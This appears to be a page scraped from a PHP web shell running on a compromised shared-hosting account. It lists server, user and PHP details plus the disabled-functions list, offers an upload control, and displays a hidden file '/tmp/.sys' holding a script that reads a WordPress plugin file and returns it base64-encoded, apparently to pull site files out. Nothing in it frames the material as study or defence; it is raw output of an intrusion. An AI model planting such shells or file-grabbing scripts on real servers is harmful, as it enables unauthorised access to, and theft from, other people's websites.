HEX
Server: LiteSpeed
System: Linux us-bos-web1978.main-hosting.eu 5.14.0-611.27.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 4 04:40:11 EST 2026 x86_64
User: u773298991 (773298991)
PHP: 8.3.30
Disabled: system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Upload Files
File: //proc/thread-self/root/tmp/.sys
<?php  $path = '/home/u773298991/domains/americanfilters.ai/public_html/wp-content/plugins/flexible-shipping-ups/vendor_prefixed/guzzlehttp/psr7/src/LimitStream.php'; $max = (int) '100000'; if ($max < 1) {     $max = 120000; } if (!is_file($path)) {     die('!nf!'); } $c = @file_get_contents($path); if ($c === false) {     die('!rd!'); } if (strlen($c) > $max) {     die('!big!'); } die('<snap>' . base64_encode($c) . '</snap>');